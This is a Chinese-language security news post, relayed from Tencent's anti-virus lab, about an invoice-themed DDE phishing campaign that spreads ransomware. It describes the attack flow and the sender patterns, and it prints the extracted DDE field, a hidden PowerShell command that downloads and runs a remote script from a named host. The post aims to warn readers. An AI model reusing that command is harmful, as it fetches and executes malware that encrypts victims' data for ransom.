爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

不扯皮,认真系系列。

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

消息搬运:腾讯反病毒实验室

目前DDE的勒索邮件正大规模爆发,根据时间的推移,这种利用方式受到越来越多黑客们的青睐。

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

DDE代码攻击原理为:

微软动态数据交换(DDE)属性允许Office应用程序从其他程序中加载数据

黑客利用DDE,在Office文档中加载恶意代码。尽管DDE功能已被对象链接与嵌入(OLE)工具包所取代,但Office为了兼容考虑依旧支持DDE功能。

黑客的攻击流程如下:

黑客使用发票等主题的钓鱼邮件为初始载荷发起攻击,当文档中的DDE代码获得运行后,DDE代*会码**调用powershell尝试从多个不同的C&C服务器*载下**loader程序,loader程序会与C&C通信*载下**勒索软件并加载执行,最终加密用户电脑数据以达到破坏数据勒索钱财的目的。

钓鱼邮件特征:

钓鱼邮件使用伪造的发件人地址,地址具有规律:常以男性名字,后面接随机数字Email名称如:

Shelby.0648@staff.XXXXXX.com,

目前得到的发件人包括:

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

邮件主题也多为与发票,文档有关的内容多为空白:

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

目前DDE的受害者因为点击了附件中的文档,Office显示提示:

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

点击“是”,WORD文档会通过CMD运行powershell命令:

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

对文档分析,可以看到DDE内容为:

DDEC:\\Windows\\System32\\cmd*ex.e**"/kpowershell-NoP-sta-NonI-whidden$e=(New-ObjectSystem.Net.WebClient).DownloadString('http://vithos.de/hjergf76');powershell -e $e "

在这个过程中的进程执行链如下:

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

然后就:

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

...

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

严肃点!忍不住憋笑

防范建议

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!

万圣节到了,DDE来捣蛋!

目前有用户被勒索*币特比**,0.05约等于1800RMB

为了减少金钱损失,尽量不要打开文档

爆网络安全,万圣节前夕「DDE钓鱼文档勒索病毒」来捣蛋!